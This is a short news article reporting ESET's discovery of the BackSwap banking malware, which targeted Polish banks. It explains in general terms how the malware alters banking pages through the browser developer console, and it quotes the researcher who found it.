Researchers at security company ESET have discovered a new piece of malware, dubbed BackSwap, that uses an innovative trick tro try and empty victims’ bank accounts.

Typically, banking malware injects itself into a user’s online banking session by modifying the web page before it is displayed in the browser, or before information about transactions is sent to the bank’s web server. This is, for instance, done to steal login information or to change the target account of a transaction and sometimes even to hide rogue transactions from the user’s view.

For this injecting, a technique called "hooking" is often applied where the malware looks for a "hook" in the browser’s code to hang its own malicious code from. While effective, this technique has two downsides for malware authors. The first is that these hooks aren’t always easy to find, and tend to change when a browser is updated, requiring the authors to regularly update their malware.

The second and more important downside is that security software explicitly looks for such hooking and often blocks the activity when it detects it, rendering the malware useless.

BackSwap, however, uses a completely different technique to modify web pages. Rather than hooking into the browser process, it takes the place of the user and enters the same commands into the browser that a user would if they wanted to hack themselves.

In particular, the malware opens a developer console, a tool present in modern browsers to make inline changes to web pages, and enters code that makes the required changes to the page’s content. To avoid suspicion, it does so while temporarily freezing the screen.

BackSwap has been found targeting various Polish banks, but in an email, ESET researcher Michal Poslušný, who had discovered the malware, said that while the authors clearly showed deep knowledge of the online banking systems of these Polish banks, there was nothing that wouldn’t make this same attack work against other banks.

"They had to put a lot of time into analyzing each of the internet banking sites," Poslušný said. "From technical point of view, the Polish banks are not any different than banks in other European countries."

It is thus an important lesson for anyone concerned with the security of online banking systems: Malware authors continue to find ways to update their malware. And sometimes they find a simple yet innovative way that gives them at least a temporary upper hand.

Subscribe Now

Authoritative analysis and perspective for every segment of the payments industry

14-Day Free Trial

Authoritative analysis and perspective for every segment of the industry

Martijn Grooten

Martijn Grooten is the current Editor of Virus Bulletin and is regularly quoted in the media as an experts on a wide range of aspects of cyber security, from malware to cryptography to email security.